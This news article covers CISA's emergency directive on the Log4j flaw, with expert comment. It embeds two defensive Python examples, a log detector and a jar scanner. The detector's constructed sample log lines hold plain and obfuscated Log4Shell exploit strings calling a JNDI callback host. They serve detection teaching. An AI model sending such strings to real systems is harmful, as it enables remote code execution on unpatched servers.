CISA Issues Emergency Directive on Log4j

In an effort to heighten the alert level for a series of vulnerabilities in the popular Java-based logging library Log4j, the Cybersecurity and Infrastructure Security Agency (CISA) issued an emergency directive. The vulnerabilities, first disclosed December 9, 2021, are under active exploitation by multiple threat actors.

CISA has determined that the vulnerability poses an unacceptable risk to federal civilian executive branch agencies and requires emergency action. The directive instructs those agencies to mitigate the Apache Log4j flaw and to respond to any cyberattacks exploiting it.

CISA Issues Emergency Directive on Log4j: Unacceptable Risk

Exploiting any one of these vulnerabilities allows an unauthenticated attacker to execute code remotely on a server.

Successful exploitation does not require the software that accepts the input to be written in Java: it is enough that a front-end component passes the malicious string on to a backend system that is written in Java and logs it with an affected Log4j version.
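The path described above (a non-Java front end forwarding attacker-controlled strings to a Java backend that logs them) is why detection usually happens on proxy or access logs rather than in the Java process. The following is an added example, not code from the article or from CISA: it normalises the nested-lookup obfuscation attackers used to slip past naive `${jndi:` string matching, then reports the callback scheme and host. The log lines and the `198.51.100.7` addresses are constructed for the example; the `normalize`, `find_jndi_lookups` and `SAMPLE_LINES` names are the example's own.

```python
import re
from urllib.parse import unquote

# Innermost ${...} with no further "${" inside; Log4j resolves these first.
LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# Once obfuscation is stripped, an exploit string collapses to ${jndi:<scheme>://<target>...}.
JNDI = re.compile(r"\$\{\s*jndi:([a-z]+)://([^/}\s]*)", re.IGNORECASE)


def _resolve(match):
    """Resolve one innermost lookup the way the attacker expects Log4j to."""
    body = match.group(1)
    key, sep, default = body.partition(":-")
    if sep:
        # ${key:-default}: the attacker picks a key that cannot resolve (${::-j},
        # ${env:NOPE:-j}) so the default wins. Assumption: real environment variables
        # and system properties are never consulted here; this is a detector, not Log4j.
        return default
    lowered = body.lower()
    if lowered.startswith("lower:"):
        return body[len("lower:"):].lower()
    if lowered.startswith("upper:"):
        return body[len("upper:"):].upper()
    # jndi:, date:, ctx: and unknown keys are left intact so they can be matched later.
    return match.group(0)


def normalize(text, max_rounds=20):
    """Percent-decode, then resolve nested lookups until the string stops changing."""
    text = unquote(text)  # query strings arrive percent-encoded in access logs
    for _ in range(max_rounds):
        resolved = LOOKUP.sub(_resolve, text)
        if resolved == text:
            break
        text = resolved
    return text


def find_jndi_lookups(lines):
    """Return one record per log line that carries a JNDI lookup after normalisation."""
    hits = []
    for number, line in enumerate(lines, start=1):
        normalized = normalize(line)
        m = JNDI.search(normalized)
        if m:
            hits.append({"line": number, "scheme": m.group(1).lower(),
                         "target": m.group(2), "normalized": normalized})
    return hits


# Constructed sample access-log lines (not real traffic) from a non-Java reverse proxy
# that forwards User-Agent and query strings to a Java backend; 198.51.100.0/24 is a
# documentation address range.
SAMPLE_LINES = [
    '10.0.0.5 - - [20/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [20/Dec/2021:10:01:03 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [20/Dec/2021:10:01:04 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${${lower:j}ndi:${lower:l}${lower:d}ap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [20/Dec/2021:10:01:05 +0000] '
    '"GET /?x=${${env:NOPE:-j}ndi:rmi://198.51.100.7:1099/b} HTTP/1.1" 404 "-" "curl/7.79"',
    '10.0.0.9 - - [20/Dec/2021:10:01:06 +0000] '
    '"GET /?x=${${::-j}${::-n}${::-d}${::-i}:dns://198.51.100.7/c} HTTP/1.1" 404 "-" "curl/7.79"',
    '10.0.0.9 - - [20/Dec/2021:10:01:07 +0000] '
    '"GET /?q=%24%7Bjndi%3Armi%3A%2F%2F198.51.100.7%3A1099%2Fd%7D HTTP/1.1" 404 "-" "curl/7.79"',
    '10.0.0.3 - - [20/Dec/2021:10:01:08 +0000] "GET /price?id=${id} HTTP/1.1" 200 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_jndi_lookups(SAMPLE_LINES):
        print(f"line {hit['line']}: {hit['scheme']} callback to {hit['target']}")
```

The normalisation step is the part worth keeping: matching the literal `${jndi:` catches only the first sample, while resolving `lower:`, `upper:` and `:-` defaults the way Log4j does catches the obfuscated variants too. Percent-decoding is applied once; doubly encoded payloads would need the decode repeated, and the `${id}` template on the last line shows that an unresolved lookup alone is not a hit.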

The directive instructs agencies to enumerate their internet-facing solution stacks, identify affected software assets, and update, mitigate or remove those assets by December 23, 2021, then report all affected software applications by December 28, 2021.

“This determination is based on the current exploitation of this vulnerability by threat actors in the wild, the likelihood of further exploitation of the vulnerability, the prevalence of the affected software in the federal enterprise, and the high potential for a compromise of agency information systems,” the directive stated.  

The current version of the emergency directive prioritized solution stacks accepting data input from the internet; however, CISA strongly recommended the same actions be applied to the entirety of agencies’ infrastructure.
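Enumerating the affected assets is the step the directive front-loads, and it is harder than grepping for `log4j-core-*.jar`: the library is routinely shaded into vendor jars under other names and nested inside war and ear files. The block below is an added example written for this article, not a CISA tool: it identifies log4j-core by the Maven `pom.properties` it carries, recurses into nested archives, and classifies each copy as vulnerable, mitigated (the `JndiLookup` class deleted, the workaround Apache documented for older versions) or patched. The fixture jars it builds are constructed stand-ins, not real Log4j binaries, and the 2.16.0 threshold is an assumption labelled in the code; agencies were directed to CISA's GitHub list for the authoritative per-CVE fix versions.

```python
import io
import re
import tempfile
import zipfile
from pathlib import Path

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
CORE_POM = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
# Assumption: 2.16.0 is used here as the "fixed" threshold for the remote code
# execution flaw. The directive pointed agencies at CISA's GitHub list for the
# authoritative per-CVE fix versions, which moved again as further CVEs appeared.
FIXED = (2, 16, 0)


def parse_version(text):
    """Turn '2.14.1' or '2.0-beta9' into a comparable tuple (suffixes are ignored)."""
    m = re.search(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)) if m else (0, 0, 0)


def inspect_archive(zf, location, findings):
    """Record any log4j-core in this archive, then recurse into nested archives."""
    names = set(zf.namelist())
    if CORE_POM in names:
        props = zf.read(CORE_POM).decode("utf-8", "replace")
        m = re.search(r"^version=(.+)$", props, re.MULTILINE)
        version = m.group(1).strip() if m else "unknown"
        jndi_present = JNDI_CLASS in names
        if parse_version(version) >= FIXED:
            status = "patched"
        elif not jndi_present:
            status = "mitigated"      # JndiLookup.class deleted from the jar
        else:
            status = "vulnerable"
        findings.append({"location": location, "version": version,
                         "jndi_lookup": jndi_present, "status": status})
    for name in sorted(names):
        if name.lower().endswith(ARCHIVE_SUFFIXES):   # fat jars, wars, ears
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except zipfile.BadZipFile:
                continue
            inspect_archive(inner, f"{location}!{name}", findings)


def scan_tree(root):
    """Walk a directory tree and return one finding per copy of log4j-core found."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in ARCHIVE_SUFFIXES and zipfile.is_zipfile(path):
            with zipfile.ZipFile(path) as zf:
                inspect_archive(zf, path.relative_to(root).as_posix(), findings)
    return findings


# ---- constructed fixture: tiny stand-in jars, not real Log4j binaries ----
def _archive(entries):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def _core_jar(version, with_jndi):
    entries = {CORE_POM: f"version={version}\nartifactId=log4j-core\n"}
    if with_jndi:
        entries[JNDI_CLASS] = b"\xca\xfe\xba\xbe"   # class-file magic, enough for the scan
    return _archive(entries)


def build_fixture(root):
    root = Path(root)
    (root / "lib").mkdir(parents=True, exist_ok=True)
    (root / "lib" / "log4j-core-2.14.1.jar").write_bytes(_core_jar("2.14.1", True))
    (root / "lib" / "log4j-core-2.14.1-hardened.jar").write_bytes(_core_jar("2.14.1", False))
    (root / "lib" / "vendor-shaded.jar").write_bytes(_core_jar("2.13.3", True))  # renamed copy
    (root / "lib" / "log4j-api-2.14.1.jar").write_bytes(_archive(
        {"META-INF/maven/org.apache.logging.log4j/log4j-api/pom.properties": "version=2.14.1\n"}))
    (root / "webapp.war").write_bytes(_archive(
        {"WEB-INF/lib/log4j-core-2.17.0.jar": _core_jar("2.17.0", True)}))


def run_demo():
    """Build the constructed fixture in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_fixture(tmp)
        return scan_tree(tmp)


if __name__ == "__main__":
    for f in run_demo():
        print(f"{f['status']:<10} log4j-core {f['version']:<8} {f['location']}")
```

Two design points matter for the directive's reporting step. Identification is by archive contents rather than file name, so the renamed `vendor-shaded.jar` is still caught while `log4j-api` alone (which does not contain the lookup code) is not reported. And the status column separates a jar that was genuinely updated from one where only the `JndiLookup` class was stripped, so the two can be tracked differently when later fix versions arrive.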

The CISA directive also noted that as this is an evolving situation, the agency planned to issue supplemental direction applicable to broader agency-owned information technologies (IT) and operational technologies (OT).

By February 15, 2022, CISA will provide a report to the Secretary of Homeland Security and the Director of the Office of Management and Budget (OMB) identifying cross-agency status and outstanding issues.

“CISA will continue to work with our partners to monitor for active exploitation associated with these vulnerabilities and will notify agencies and provide additional guidance, as appropriate,” the directive noted. “[The agency] will provide technical assistance to agencies who are without internal capabilities sufficient to comply with this directive.”

CISA also urged critical infrastructure owners and operators to take immediate steps to strengthen their computer network defenses against potential malicious cyberattacks in light of persistent and ongoing cyberthreats and the lead-up to the holidays. 

Among its recommendations, CISA urged IT security leaders to ensure that network defenders implement cybersecurity best practices, increase organizational vigilance and prepare their organizations for rapid response.

“Have staff check reporting processes and exercise continuity of operations plans to test your ability to operate key functions in an IT-constrained or otherwise degraded environment,” CISA said in its December 15, 2021 advisory. “Consider your organization’s cross-sector dependencies and the impact that a potential incident at your organization may have on other sectors, as well as how an incident at those sectors could affect your organization.”

Dor Dali, director of information security at Vulcan Cyber, a provider of SaaS for enterprise cybersecurity risk remediation, explained that every cybersecurity organization knows they need to take action to mitigate Log4Shell.

The question is: What action is necessary for their environment?

“The unfortunate answer is, ‘It depends’,” Dali said. “If a federal agency needs to be told to take action, there is also a really good chance they don’t know their security posture rating specific to Log4j and they are scrambling to know where to start.”

Dali recommends they use at least one vulnerability scanner, subscribe to a threat intelligence feed, compile asset data and establish threat tolerance levels and risk SLAs.

“Aggregate all of this data by organizational or functional groupings within the agency to make it manageable and then start prioritizing and delegating the work of mitigation,” he said. “You can’t fix what you don’t understand, making it imperative to first get a holistic view of Log4Shell risk posture before chasing ghosts in the machine.”

‘Ankle Biters and Script Kiddies’

Jake Williams, co-founder and CTO at BreachQuest, an incident response specialist, added that there is no doubt threat actors targeting the U.S. government will use this vulnerability, though he wouldn't expect those at the top of the food chain to be among them.

“At this point, every IDS and network security monitoring solution is looking for Log4j JNDI exploits, so if you’re a nation-state threat actor looking to establish long-term persistence for intelligence operations, using this makes little sense,” he said. “At this stage, CISA’s directive is mostly protecting agencies from ankle biters and script kiddies.”

He explained the need for caution when mandating reporting requirements, especially in response to high-profile vulnerability events such as Log4j. While Log4j is consuming the news cycle right now and it might appear to be a good time to push additional reporting requirements, those requirements, however well-intended, could have negative repercussions.

“However, policymakers should ensure that they don’t unintentionally cause operational issues by mandating reporting,” Williams said. “Additionally, the breach reporting has to serve some purpose. There must be a direct line connected between the breach reported and an increase in public security posture.”

Nathan Eddy

Nathan Eddy is a Berlin-based filmmaker and freelance journalist specializing in enterprise IT and security issues, health care IT and architecture.
